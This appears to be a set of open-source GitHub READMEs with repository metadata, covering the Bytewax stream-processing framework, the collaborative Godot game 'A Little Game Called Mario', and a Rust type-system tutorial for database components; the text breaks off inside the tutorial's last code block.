Bytewax is a Python framework and Rust distributed processing engine that uses a dataflow computational model to provide parallelizable stream processing and event processing capabilities similar to Flink, Spark, and Kafka Streams. You can use Bytewax for a variety of workloads from moving data à la Kafka Connect style all the way to advanced online machine learning workloads. Bytewax is not limited to streaming applications but excels anywhere that data can be distributed at the input and output.
Bytewax has an accompanying command line interface, [waxctl](https://docs.bytewax.io/stable/guide/deployment/waxctl.html), which supports the deployment of dataflows on cloud servers or Kubernetes. You can download it [here](https://bytewax.io/waxctl).
---
### Getting Started with Bytewax
```sh
pip install bytewax
```
[_Install waxctl_](https://bytewax.io/waxctl)
#### Dataflow, Input and Operators
A Bytewax dataflow is Python code that will represent an input, a series of processing steps, and an output. The inputs could range from a Kafka stream to a WebSocket and the outputs could vary from a data lake to a key-value store.
```python
import json
from bytewax import operators as op
from bytewax.connectors.kafka import operators as kop
from bytewax.dataflow import Dataflow
```
Bytewax has input and output helpers for common input and output data sources but you can also create your own with the [Sink and Source API](https://docs.bytewax.io/stable/guide/advanced-concepts/custom-connectors.html).
At a high-level, the dataflow compute model is one in which a program execution is conceptualized as data flowing through a series of operator-based steps. Operators like `map` and `filter` are the processing primitives of Bytewax. Each of them gives you a “shape” of data transformation, and you give them regular Python functions to customize them to a specific task you need. See the documentation for a list of the [available operators](https://docs.bytewax.io/stable/api/bytewax/bytewax.operators.html)
```python
BROKERS = ["localhost:19092"]
IN_TOPICS = ["in_topic"]
OUT_TOPIC = "out_topic"
ERR_TOPIC = "errors"
def deserialize(kafka_message):
return json.loads(kafka_message.value)
def anonymize_email(event_data):
event_data["email"] = "@".join(["******", event_data["email"].split("@")[-1]])
return event_data
def remove_bytewax(event_data):
return "bytewax" not in event_data["email"]
flow = Dataflow("kafka_in_out")
stream = kop.input("inp", flow, brokers=BROKERS, topics=IN_TOPICS)
# we can inspect the stream coming from the kafka topic to view the items within on std out for debugging
op.inspect("inspect-oks", stream.oks)
# we can also inspect kafka errors as a separate stream and raise an exception when one is encountered
errs = op.inspect("errors", stream.errs).then(op.raises, "crash-on-err")
deser_msgs = op.map("deserialize", stream.oks, deserialize)
anon_msgs = op.map("anon", deser_msgs, anonymize_email)
filtered_msgs = op.filter("filter_employees", anon_msgs, remove_bytewax)
processed = op.map("map", anon_msgs, lambda m: KafkaSinkMessage(None, json.dumps(m)))
# and finally output the cleaned data to a new topic
kop.output("out1", processed, brokers=BROKERS, topic=OUT_TOPIC)
```
#### Windowing, Reducing and Aggregating
Bytewax is a stateful stream processing framework, which means that some operations remember information across multiple events. Windows and aggregations are also stateful, and can be reconstructed in the event of failure. Bytewax can be configured with different [state recovery mechanisms](https://docs.bytewax.io/stable/api/bytewax/bytewax.recovery.html) to durably persist state in order to recover from failure.
There are multiple stateful operators available like `reduce`, `stateful_map` and `fold_window`. The complete list can be found in the [API documentation for all operators](https://docs.bytewax.io/stable/api/bytewax/bytewax.operators.html). Below we use the `fold_window` operator with a tumbling window based on system time to gather events and calculate the number of times events have occurred on a per-user basis.
```python
from datetime import datetime, timedelta, timezone
from bytewax.dataflow import Dataflow
import bytewax.operators.windowing as win
from bytewax.operators.windowing import EventClock, TumblingWindower
from bytewax.testing import TestingSource
flow = Dataflow("window_eg")
src = [
{"user_id": "123", "value": 5, "time": "2023-1-1T00:00:00Z"},
{"user_id": "123", "value": 7, "time": "2023-1-1T00:00:01Z"},
{"user_id": "123", "value": 2, "time": "2023-1-1T00:00:07Z"},
]
inp = op.input("inp", flow, TestingSource(src))
keyed_inp = op.key_on("keyed_inp", inp, lambda x: x["user_id"])
# This function instructs the event clock on how to retrieve the
# event's datetime from the input.
# Note that the datetime MUST be UTC. If the datetime is using a different
# representation, we would have to convert it here.
def get_event_time(event):
return datetime.fromisoformat(event["time"])
# Configure the `fold_window` operator to use the event time.
clock = EventClock(get_event_time, wait_for_system_duration=timedelta(seconds=10))
# And a 5 seconds tumbling window
align_to = datetime(2023, 1, 1, tzinfo=timezone.utc)
windower = TumblingWindower(align_to=align_to, length=timedelta(seconds=5))
five_sec_buckets_win_out = win.collect_window(
"five_sec_buckets", keyed_inp, clock, windower
)
def calc_avg(bucket):
values = [event["value"] for event in bucket]
if len(values) > 0:
return sum(values) / len(values)
else:
return None
five_sec_avgs = op.map_value("avg_in_bucket", five_sec_buckets_win_out.down, calc_avg)
```
#### Merges and Joins
Merging or Joining multiple input streams is a common task for stream processing, Bytewax enables different types of joins to facilitate different patters.
##### Merging Streams
Merging streams is like concatenating, there is no logic and the resulting stream will potentially include heterogeneous records.
```python
from bytewax import operators as op
from bytewax.connectors.stdio import StdOutSink
from bytewax.dataflow import Dataflow
from bytewax.testing import TestingSource
flow = Dataflow("merge")
src_1 = [
{"user_id": "123", "name": "Bumble"},
]
inp1 = op.input("inp1", flow, TestingSource(src_1))
src_2 = [
{"user_id": "123", "email": "bee@bytewax.com"},
{"user_id": "456", "email": "hive@bytewax.com"},
]
inp2 = op.input("inp2", flow, TestingSource(src_2))
merged_stream = op.merge("merge", inp1, inp2)
op.inspect("debug", merged_stream)
```
##### Joining Streams
Joining streams is different than merging because it uses logic to join the records in the streams together. The joins in Bytewax can be running or not. A regular join in streaming is more closely related to an inner join in SQL in that the dataflow will emit data downstream from a join when all of the sides of the join have matched on the key.
```python
from bytewax import operators as op
from bytewax.connectors.stdio import StdOutSink
from bytewax.dataflow import Dataflow
from bytewax.testing import TestingSource
flow = Dataflow("join")
src_1 = [
{"user_id": "123", "name": "Bumble"},
]
inp1 = op.input("inp1", flow, TestingSource(src_1))
keyed_inp_1 = op.key_on("key_stream_1", inp1, lambda x: x["user_id"])
src_2 = [
{"user_id": "123", "email": "bee@bytewax.com"},
{"user_id": "456", "email": "hive@bytewax.com"},
]
inp2 = op.input("inp2", flow, TestingSource(src_2))
keyed_inp_2 = op.key_on("key_stream_2", inp2, lambda x: x["user_id"])
merged_stream = op.join("join", keyed_inp_1, keyed_inp_2)
op.inspect("debug", merged_stream)
```
#### Output
Output in Bytewax is described as a sink and these are grouped into [connectors](https://docs.bytewax.io/stable/api/bytewax/bytewax.connectors.html). There are a number of basic connectors in the Bytewax repo to help you during development. In addition to the built-in connectors, it is possible to use the input and output API to build a custom sink and source. There is also a hub for connectors built by the community, partners and Bytewax. Below is an example of a custom connector for Postgres using the psycopg2 library.
% skip: next
```python
import psycopg2
from bytewax import operators as op
from bytewax.outputs import FixedPartitionedSink, StatefulSinkPartition
class PsqlSink(StatefulSinkPartition):
def __init__(self):
self.conn = psycopg2.connect("dbname=website user=bytewax")
self.conn.set_session(autocommit=True)
self.cur = self.conn.cursor()
def write_batch(self, values):
query_string = """
INSERT INTO events (user_id, data)
VALUES (%s, %s)
ON CONFLICT (user_id)
DO UPDATE SET data = %s;
"""
self.cur.execute_values(query_string, values)
def snapshot(self):
pass
def close(self):
self.conn.close()
class PsqlOutput(FixedPartitionedSink):
def list_parts(self):
return ["single"]
def build_part(step_id, for_part, resume_state):
return PsqlSink()
```
#### Execution
Bytewax dataflows can be executed in a single Python process, or on multiple processes on multiple hosts with multiple worker threads. When processing data in a distributed fashion, Bytewax uses routing keys to ensure your state is updated in a correct way automatically.
```sh
# a single worker locally
python -m bytewax.run my_dataflow:flow
# Start two worker threads in a single process.
python -m bytewax.run my_dataflow -w 2
# Start a process on two separate machines to form a Bytewax cluster.
# Start the first process with two worker threads on `machine_one`.
machine_one$ python -m bytewax.run my_dataflow -w 2 -i0 -a "machine_one:2101;machine_two:2101"
# Then start the second process with three worker threads on `machine_two`.
machine_two$ python -m bytewax.run my_dataflow -w 3 -i1 -a "machine_one:2101;machine_two:2101"
```
It can also be run in a Docker container as described further in the [documentation](https://docs.bytewax.io/stable/guide/deployment/container.html).
#### Kubernetes
The recommended way to run dataflows at scale is to leverage the [kubernetes ecosystem](https://docs.bytewax.io/stable/guide/deployment/waxctl.html). To help manage deployment, we built [waxctl](https://docs.bytewax.io/stable/guide/deployment/waxctl.html), which allows you to easily deploy dataflows that will run at huge scale across multiple compute nodes.
```sh
waxctl df deploy my_dataflow.py --name my-dataflow
```
## Why Bytewax?
At a high level, Bytewax provides a few major benefits:
- The operators in Bytewax are largely “data-parallel”, meaning they can operate on independent parts of the data concurrently.
- Bytewax offers the ability to express higher-level control constructs, like iteration.
- Bytewax allows you to develop and run your code locally, and then easily scale that code to multiple workers or processes without changes.
- Bytewax can be used in both a streaming and batch context
- Ability to leverage the Python ecosystem directly
## Community
[Slack](https://join.slack.com/t/bytewaxcommunity/shared_invite/zt-vkos2f6r-_SeT9pF2~n9ArOaeI3ND2w) is the main forum for communication and discussion.
[GitHub Issues](https://github.com/bytewax/bytewax/issues) is reserved only for actual issues. Please use the community Slack for discussions.
[Code of Conduct](https://github.com/bytewax/bytewax/blob/main/CODE_OF_CONDUCT.md)
## More Examples
For a more complete example, and documentation on the available operators, check out the [User Guide](https://docs.bytewax.io/stable/guide/index.html) and the [/examples](examples) folder.
## License
Bytewax is licensed under the [Apache-2.0](https://opensource.org/licenses/APACHE-2.0) license.
## Contributing
Contributions are welcome! This community and project would not be what it is without the [contributors](https://github.com/bytewax/bytewax/graphs/contributors). All contributions, from bug reports to new features, are welcome and encouraged.
Please view the [Contribution Guide](https://docs.bytewax.io/stable/guide/contributing/contributing.html) for how to get started.
</br>
</br>
<p align="center"> With ❤️ Bytewax</p>
<p align="center"><img src="https://user-images.githubusercontent.com/6073079/157482621-331ad886-df3c-4c92-8948-9e50accd38c9.png" /> </p>
<img referrerpolicy="no-referrer-when-downgrade" src="https://static.scarf.sh/a.png?x-pxid=07749572-3e76-4ac0-952b-d5dcf3bff737" />
| Python Stream Processing | python,stream-processing,rust,data-engineering,data-processing,data-science,dataflow,machine-learning,streaming-data | 28 | 20 | 383 | 2,355 | 16 | 7 | 4 |
a-little-org-called-mario/a-little-game-called-mario | # A Little Game Called Mario
> **open source collective hell game**
a bad idea from the mind of [izzy kestrel](https://twitter.com/iznaut), inspired by [Aaron San Filippo](https://twitter.com/AeornFlippout)
[![GitHub contributors](https://img.shields.io/github/contributors/a-little-org-called-mario/a-little-game-called-mario.svg)](https://GitHub.com/a-little-org-called-mario/a-little-game-called-mario/graphs/contributors/) [![GitHub contributors](https://img.shields.io/github/workflow/status/a-little-org-called-mario/a-little-game-called-mario/build%20and%20publish.svg)](https://github.com/a-little-org-called-mario/a-little-game-called-mario/actions) [![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)
# 🎮 [play the latest version here](http://play.little-mario.com/) 🎮
[![Screenshot Of A Little Game Called Mario](/.godot_ignore/screenshot.gif)](https://twitter.com/iznaut/status/1508179935977947142)
# 🗣 [join the discord server](http://community.little-mario.com/) (by joining our discord you are agreeing to abide by our [code of conduct](code_of_conduct.md)) 🗣
[![The tweet](.godot_ignore/the_tweet.png)](https://twitter.com/iznaut/status/1508179935977947142)
# about
this is (at least to start), a simple 2D platformer game made with Godot Engine. it exists for all to enjoy - not only as players, but also as Game Developers.
finally, we can put the discourse to rest. are you a Game Developer? no? why not? all you have to do is make some changes to this project. it's that simple.
will you add some art? some music? some new gameplay mechanics? dialog? robust multiplayer functionality with rollback netcode? it's up to you.
> **your contributions are valuable regardless of how experienced you are or where your strengths lie.**
even if you never touch a line of code, you're still valuable as a player who can spot things that are wrong and reporting them for others to fix.
> **i would even go so far as to say you're still a Game Developer by simply playtesting and providing QA support - games wouldn't exist without those people!**
this is a game that will live or die by its ability to capture a collective imagination and i like to believe that people can do some pretty amazing things when they organize together under a common goal.
so the next time someone asks, "oh, you're a game developer?" you can proudly say:
**"yes. i worked on A Little Game Called Mario. heard of it?"**
# rules
be kind, respectful, and have empathy for your players and fellow developers. this means:
- adding content that improves the player's experience
- adding comments/tools/utilities that make it easier for less experienced developers to contribute
- removing content that is racist, homophobic, transphobic, ableist, or any other number of things that diminish the work and make it less accessible to anyone who might want to play or contribute to it
your contributions should be additive whenever possible.
> **this is not *your* game, it is everyone's game.**
if you believe changing/removing existing features could improve the game, that's great! but please try to get in touch with the people who originally made those choices and see if you can collaborate rather than disregard their hard work.
> **assume their contributions were made with just as much intentionality as yours and should be just as valued.**
don't be shy about talking to new people, be it to collaborate or just to ask for help! you're all here for the same reason: to make a game.
> **the whole point is collaboration and making new friends.**
## please read through our [code of conduct](code_of_conduct.md)!
# contributing
there are many ways to contribute to the project! games are complex things with a lot of moving parts that only exist because collaboration between creative and technical disciplines makes that happen. here are just a few ways you might be able to help out:
## 🎨 **if you're the creative type** 🎨
make something! anything! it doesn't need to be perfect or polished and it certainly doesn't have to be hooked up via code right away! leave a little gift for the more technical/design-minded folks - their eyes will light up as they think of a dozen different ways it could be implemented as a weird new power-up or something.
[learn more about submitting assets](http://assets.little-mario.com/)
## ⚙️ **if you're the technical type** ⚙️
see if there are any open [issues](https://github.com/a-little-org-called-mario/a-little-game-called-mario/issues) to work on! these can range from bug reports to feature requests and some of them may even be tagged as a "good first issue" for new folks. you can also dig around in closed issues and check out what people are actively working on in pull requests.
[learn more about making code changes](https://github.com/a-little-org-called-mario/a-little-game-called-mario/wiki/Contribution-Basics)
## 🤔 **don't forget the designer types!** 🤔
i think these folks get a bad rap (not just saying that bc i'm one of them!!) - design is important and even tho you can't throw a rock without hitting someone with a "good game idea", what you may not appreciate is how hard it actually can be to execute on! and i'm not talking about learning to code or create art to support your vision....we have plenty of folks here who are already experts at those things! but at the same time, those same folks may not think about problems in the same creative way that you do.
check out the [discussions](https://github.com/a-little-org-called-mario/a-little-game-called-mario/discussions) and [issues](https://github.com/a-little-org-called-mario/a-little-game-called-mario/issues) to see if there are any conversations you might be able to contribute to and don't forget to [join our discord](http://community.little-mario.com/) to see what other folks are talking about!
# 🎮 about the game engine 🎮
[Godot Engine](https://godotengine.org/) is a free and open-source tool for making video games. Check out this video for a very quick primer: [The Godot Game Engine Explained in 5 Minutes](https://www.youtube.com/watch?v=KjX5llYZ5eQ)
you can download Godot here:
- [Windows](https://downloads.tuxfamily.org/godotengine/3.4.4/Godot_v3.4.4-stable_win64.exe.zip)
- [Mac OS X](https://downloads.tuxfamily.org/godotengine/3.4.4/Godot_v3.4.4-stable_osx.universal.zip)
- [Linux](https://downloads.tuxfamily.org/godotengine/3.4.4/Godot_v3.4.4-stable_x11.64.zip)
> **this project was created with v3.4.4 - if you have an older version installed, we recommend upgrading to avoid compatibility issues during development**
Godot is relatively easy to learn but can be fairly powerful. the documentation is very good and includes some helpful resources:
- [Getting Started](https://docs.godotengine.org/en/3.4/getting_started/introduction/index.html)
- [Your First 2D Game](https://docs.godotengine.org/en/stable/getting_started/first_2d_game/index.html)
- [Tutorials and resources](https://docs.godotengine.org/en/stable/community/tutorials.html)
if videos are more your thing, i recommend these channels:
- [GDQuest](https://www.youtube.com/channel/UCxboW7x0jZqFdvMdCFKTMsQ)
- [Godot Tutorials](https://www.youtube.com/channel/UCnr9ojBEQGgwbcKsZC-2rIg)
> this video was used as reference to create the framework for this project: [Make your first 2D platformer game IN JUST 10 MINUTES](https://www.youtube.com/watch?v=xFEKIWpd0sU)
# this is all rad but i'm still intimidated 😱
i could go on for _hours_ about impostor syndrome and all that junk (stuff i feel, just the same as you!!) but some ppl need more encouragement than others so i won't attempt a one-size fits all spiel here 😉
### but if you have questions/feedback/concerns/ideas/whatev PLEASE don't hesitate to ask for help on our [discord server](http://community.little-mario.com/)!!
## with that, i relinquish all creative control of this beautiful beast. godspeed, Little Mario. make mommy proud 💖
| open source collective hell game | game,game-development,gamedev,godot | 414 | 105 | 492 | 577 | 0 | 2 | 8 |
skyzh/type-exercise-in-rust | # Type Exercise in Rust
This is a short lecture on how to use the Rust type system to build necessary components in a database system.
The lecture evolves around how Rust programmers (like me) build database systems in the Rust programming language. We leverage the Rust type system to **minimize** runtime cost and make our development process easier with **safe**, **nightly** Rust.
In this tutorial, you will learn:
* How to build an Arrow-like library with strong compile-time type. (Day 1 - 3)
* How to use declarative macros to implement dispatch functions on a non-object-safe trait. (Day 4)
* How to use GAT (generic associated types) and how to vectorize any scalar function with GAT generic parameter. (Day 5 - 6)
* ... how to by-pass compiler bugs on GAT lifetime in Fn trait.
* ... how to manually implement covariant on GAT lifetime.
* ... how to correctly add trait bounds for GAT.
* How to use declarative macros to associate things together. (Day 7)
![Map of Types](map-of-types.png)
## Community
You may join skyzh's Discord server and study with the type-exercise community.
[![Join skyzh's Discord Server](https://dcbadge.vercel.app/api/server/ZgXzxpua3H)](https://skyzh.dev/join/discord)
## See Also...
### RisingLight
[RisingLight](https://github.com/risinglightdb/risinglight) is an OLAP database system for educational purpose. Most of the techniques described in this lecture have already been implemented in our educational database system “RisingLight”.
### Databend
Databend's expression evaluation implementation is greatly influenced by type-exercise. You may see the implementation in [datavalues crate](https://github.com/datafuselabs/databend/blob/main/common/datavalues/src/scalars/mod.rs).
### RisingWave
[RisingWave](https://github.com/singularity-data/risingwave) is a cloud-native streaming database product. It is the first time that I experimented with GAT-related things in RisingWave to auto vectorize expressions. It applies almost the same techniques as described in this lecture.
### TiKV Coprocessor
I worked on TiKV two years ago on its expression evaluation framework. At the time of building [TiKV coprocessor](https://github.com/tikv/tikv/tree/master/components/tidb_query_expr), there is no GAT. TiKV coprocessor is an example of using procedural macro to unify behavior of different types of arrays, which is totally a different approach from this tutorial (but maybe in a more understandable manner). You may also take a look!
### Related Issues in Rust Compiler
During writing this tutorial, I found several confusing compile errors from the compiler. If all of them have been solved on the Rust side, we could have written GAT program easier!
* https://github.com/rust-lang/rust/issues/93342
* https://github.com/rust-lang/rust/issues/93340
## Deep Dive Type Exercise Series (in Chinese)
On My Blog:
* [Part 0 - Part 2](https://www.skyzh.dev/posts/articles/2022-01-22-rust-type-exercise-in-database-executors/)
* [Part 3 - Part 6](https://www.skyzh.dev/posts/articles/2022-01-24-rust-type-exercise-in-database-executors-middle/)
* [Part 7](https://www.skyzh.dev/posts/articles/2022-02-01-rust-type-exercise-in-database-executors-final/)
On Zhihu:
* [Part 0: Intro](https://zhuanlan.zhihu.com/p/460702914)
* [Part 1: Array and ArrayBuilder](https://zhuanlan.zhihu.com/p/460977012)
* [Part 2: Scalar and ScalarRef](https://zhuanlan.zhihu.com/p/461405621)
* [Part 3, 4: TryFrom and Macro Expansion](https://zhuanlan.zhihu.com/p/461657165)
* [Part 5, 6: Bypassing GAT Compile Errors (or Compiler Bugs?)](https://zhuanlan.zhihu.com/p/461901665)
* [Part 7: Associate Logical Types with Physical Types](https://zhuanlan.zhihu.com/p/463477290)
## Day 1: `Array` and `ArrayBuilder`
`ArrayBuilder` and `Array` are reciprocal traits. `ArrayBuilder` creates an `Array`, while we can create a new array
using `ArrayBuilder` with existing `Array`. In day 1, we implement arrays for primitive types (like `i32`, `f32`)
and for variable-length types (like `String`). We use associated types in traits to deduce the right type in generic
functions and use GAT to unify the `Array` interfaces for both fixed-length and variable-length types. This framework
is also very similar to libraries like Apache Arrow, but with much stronger type constraints and much lower runtime
overhead.
The special thing is that, we use blanket implementation for `i32` and `f32` arrays -- `PrimitiveArray<T>`. This would
make our journey much more challenging, as we need to carefully evaluate the trait bounds needed for them in the
following days.
### Goals
Developers can create generic functions over all types of arrays -- no matter fixed-length primitive array like
`I32Array`, or variable-length array like `StringArray`.
Without our `Array` trait, developers might to implement...
```rust
fn build_i32_array_from_vec(items: &[Option<i32>]) -> Vec<i32> { /* .. */ }
fn build_str_array_from_vec(items: &[Option<&str>]) -> Vec<String> { /* .. */ }
```
Note that the function takes different parameter -- one `i32` without lifetime, one `&str`. Our `Array` trait
can unify their behavior:
```rust
fn build_array_from_vec<A: Array>(items: &[Option<A::RefItem<'_>>]) -> A {
let mut builder = A::Builder::with_capacity(items.len());
for item in items {
builder.push(*item);
}
builder.finish()
}
#[test]
fn test_build_int32_array() {
let data = vec![Some(1), Some(2), Some(3), None, Some(5)];
let array = build_array_from_vec::<I32Array>(&data[..]);
}
#[test]
fn test_build_string_array() {
let data = vec![Some("1"), Some("2"), Some("3"), None, Some("5"), Some("")];
let array = build_array_from_vec::<StringArray>(&data[..]);
}
```
Also, we will be able to implement an `ArrayIterator` for all types of `Array`s.
## Day 2: `Scalar` and `ScalarRef`
`Scalar` and `ScalarRef` are reciprocal types. We can get a reference `ScalarRef` of a `Scalar`, and convert
`ScalarRef` back to `Scalar`. By adding these two traits, we can write more generic functions with zero runtime
overhead on type matching and conversion. Meanwhile, we associate `Scalar` with `Array`, so as to write functions
more easily.
### Goals
Without our `Scalar` implement, there could be problems:
```rust
fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A {
let mut builder = A::Builder::with_capacity(len);
for _ in 0..len {
builder.push(Some(item /* How to convert `item` to `RefItem`? */));
}
builder.finish()
}
```
With `Scalar` trait and corresponding implements,
```rust
fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A {
let mut builder = A::Builder::with_capacity(len);
for _ in 0..len {
builder.push(Some(item.as_scalar_ref())); // Now we have `as_scalar_ref` on `Scalar`!
}
builder.finish()
}
```
## Day 3: `ArrayImpl`, `ArrayBuilderImpl`, `ScalarImpl` and `ScalarRefImpl`
It could be possible that some information is not available until runtime. Therefore, we use `XXXImpl` enums to
cover all variants of a single type. At the same time, we also add `TryFrom<ArrayImpl>` and `Into<ArrayImpl>`
bound for `Array`.
### Goals
This is hard -- imagine we simply require `TryFrom<ArrayImpl>` and `Into<ArrayImpl>` bound on `Array`:
```rust
pub trait Array:
Send + Sync + Sized + 'static + TryFrom<ArrayImpl> + Into<ArrayImpl>
```
Compiler will complain:
```
43 | impl<T> Array for PrimitiveArray<T>
| ^^^^^ the trait `From<PrimitiveArray<T>>` is not implemented for `array::ArrayImpl`
|
= note: required because of the requirements on the impl of `Into<array::ArrayImpl>` for `PrimitiveArray<T>`
```
This is because we use blanket implementation for `PrimitiveArray` to cover all primitive types. In day 3,
we learn how to correctly add bounds to `PrimitiveArray`.
## Day 4: More Types and Methods with Macro
`ArrayImpl` should supports common functions in traits, but `Array` trait doesn't have a unified interface for
all types -- `I32Array` accepts `get(&self, idx: usize) -> Option<i32>` while `StringArray` accepts
`get(&self, idx: usize) -> &str`. We need a `get(&self, idx:usize) -> ScalarRefImpl<'_>` on `ArrayImpl`. Therefore,
we have to write the match arms to dispatch the methods.
Also, we have written so many boilerplate code for `From` and `TryFrom`. We need to eliminate such duplicated code.
As we are having more and more data types, we need to write the same code multiple times within a match arm. In
day 4, we use declarative macros (instead of procedural macros or other kinds of code generator) to generate such
code and avoid writing boilerplate code.
### Goals
Before that, we need to implement every `TryFrom` or `Scalar` by ourselves:
```rust
impl<'a> ScalarRef<'a> for i32 {
type ArrayType = I32Array;
type ScalarType = i32;
fn to_owned_scalar(&self) -> i32 {
*self
}
}
// repeat the same code fore i64, f64, ...
```
```rust
impl ArrayImpl {
/// Get the value at the given index.
pub fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>> {
match self {
Self::Int32(array) => array.get(idx).map(ScalarRefImpl::Int32),
Self::Float64(array) => array.get(idx).map(ScalarRefImpl::Float64),
// ...
// repeat the types for every functions we added on `Array`
}
}
```
With macros, we can easily add more and more types. In day 4, we will support:
```rust
pub enum ArrayImpl {
Int16(I16Array),
Int32(I32Array),
Int64(I64Array),
Float32(F32Array),
Float64(F64Array),
Bool(BoolArray),
String(StringArray),
}
```
With little code changed and eliminating boilerplate code.
## Day 5: Binary Expressions
Now that we have `Array`, `ArrayBuilder`, `Scalar` and `ScalarRef`, we can convert every function we wrote to a
vectorized one using generics.
### Goals
Developers will only need to implement:
```rust
pub fn str_contains(i1: &str, i2: &str) -> bool {
i1.contains(i2)
}
```
And they can create `BinaryExpression` around this function with any type:
```rust
// Vectorize `str_contains` to accept an array instead of a single value.
let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(str_contains);
// We only need to pass `ArrayImpl` to the expression, and it will do everything for us,
// including type checks, loopping, etc.
let result = expr
.eval(
&StringArray::from_slice(&[Some("000"), Some("111"), None]).into(),
&StringArray::from_slice(&[Some("0"), Some("0"), None]).into(),
)
.unwrap();
```
Developers can even create `BinaryExpression` around generic functions:
```rust
pub fn cmp_le<'a, I1: Array, I2: Array, C: Array + 'static>(
i1: I1::RefItem<'a>,
i2: I2::RefItem<'a>,
) -> bool
where
I1::RefItem<'a>: Into<C::RefItem<'a>>,
I2::RefItem<'a>: Into<C::RefItem<'a>>,
C::RefItem<'a>: PartialOrd,
{
i1.into().partial_cmp(&i2.into()).unwrap() == Ordering::Less
}
```
```rust
// Vectorize `cmp_le` to accept an array instead of a single value.
let expr = BinaryExpression::<I32Array, I32Array, BoolArray, _>::new(
cmp_le::<I32Array, I32Array, I64Array>,
);
let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap();
// `cmp_le` can also be used on `&str`.
let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(
cmp_le::<StringArray, StringArray, StringArray>,
);
let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap();
```
## Day 6: Erase Expression Lifetime
Vectorization looks fancy in the implementation in day 5, but there is a critical flaw -- `BinaryExpression`
can only process `&'a ArrayImpl` instead of for any lifetime.
```rust
impl<'a, I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> {
pub fn eval(&self, i1: &'a ArrayImpl, i2: &'a ArrayImpl) -> Result<ArrayImpl> {
// ...
}
}
```
In day 6, we erase the expression lifetime by defining a `BinaryExprFunc` trait and implements it for all expression
functions. The `BinaryExpression` will be implemented as follows:
```rust
impl<I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> {
pub fn eval(&self, i1: &ArrayImpl, i2: &ArrayImpl) -> Result<ArrayImpl> {
// ...
}
}
```
And there will be an `Expression` trait which can be made into a trait object:
```rust
pub trait Expression {
/// Evaluate an expression with run-time number of [`ArrayImpl`]s.
fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>;
}
```
In this day, we have two solutions -- the hard way and the easy way.
### Goals -- The Easy Way
If we make each scalar function into a struct, things will be a lot easier.
Developers will now implement scalar function as follows:
```rust
pub struct ExprStrContains;
impl BinaryExprFunc<StringArray, StringArray, BoolArray> for ExprStrContains {
fn eval(&self, i1: &str, i2: &str) -> bool {
i1.contains(i2)
}
}
```
And now we can have an expression trait over all expression, with all type and lifetime erased:
```rust
pub trait Expression {
/// Evaluate an expression with run-time number of [`ArrayImpl`]s.
fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>;
}
```
`Expression` can be made into a `Box<dyn Expression>`, therefore being used in building expressions at runtime.
### ~~Goals -- The Hard Way~~
As [rust-lang/rust #90087](https://github.com/rust-lang/rust/pull/90887) lands, the compiler bugs have been fixed. So we don't need to do any extra work for this day to support function expressions. All `BinaryExprFunc` can be replaced with `F: Fn(I1::RefType<'_>, I2::RefType<'_>) -> O`.
In the hard way chapter, we will dive into the black magics and fight against (probably) compiler bugs, so as
to make function vectorization look very approachable to SQL function developers.
To begin with, we will change the signature of `BinaryExpression` to take `Scalar` as parameter:
```rust
pub struct BinaryExpression<I1: Scalar, I2: Scalar, O: Scalar, F> {
func: F,
_phantom: PhantomData<(I1, I2, O)>,
}
```
Then we will do a lot of black magics on `Scalar` type, so as to do the conversion freely between `Array::RefItem`
and `Scalar::RefType`. This will help us bypass most of the issues in GAT, and yields the following vectorization
code:
```rust
builder.push(Some(O::cast_s_to_a(
self.func
.eval(I1::cast_a_to_s(i1), I2::cast_a_to_s(i2))
.as_scalar_ref(),
)))
```
We will construct a bridge trait `BinaryExprFunc` between plain functions and the one that can be used by
`BinaryExpression`.
And finally developers can simply write a function and supply it to `BinaryExpression`.
```rust
let expr = BinaryExpression::<String, String, bool, _>::new(str_contains);
```
... or even with lambda functions:
```rust
let expr = BinaryExpression::<String, String, bool, _>::new(|x1: &str, x2: &str| x1.contains(x2));
```
## Day 7: Physical Data Type and Logical Data Type
`i32`, `i64` is simply physical types -- how types are stored in memory (or on disk). But in a database system,
we also have logical types (like `Char`, and `Varchar`). In day 7, we learn how to associate logical types with
physical types using macros.
### Goals
Going back to our `build_binary_expression` function,
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
) -> Box<dyn Expression> {
match f {
CmpLe => Box::new(BinaryExpression::<I32Array, I32Array, BoolArray, _>::new(
ExprCmpLe::<_, _, I32Array>(PhantomData),
)),
/* ... */
```
Currently, we only support `i32 < i32` for `CmpLe` expression. We should be able to support cross-type comparison here.
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
i1: DataType,
i2: DataType
) -> Box<dyn Expression> {
match f {
CmpLe => match (i1, i2) {
(SmallInt, SmallInt) => /* I16Array, I16Array */,
(SmallInt, Real) => /* I16Array, Float32, cast to Float64 before comparison */,
/* ... */
}
/* ... */
```
We have so many combinations of cross-type comparison, and we couldn't write them all by-hand. In day 7, we use
macros to associate logical data type with `Array` traits, and reduce the complexity of writing such functions.
**Goals -- The Easy Way**
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
i1: DataType,
i2: DataType,
) -> Box<dyn Expression> {
use ExpressionFunc::*;
use crate::array::*;
use crate::expr::cmp::*;
use crate::expr::string::*;
match f {
CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpLe },
CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpGe },
CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpEq },
CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpNe },
StrContains => Box::new(
BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(ExprStrContains),
),
}
}
```
**Goals -- The Hard Way**
```rust
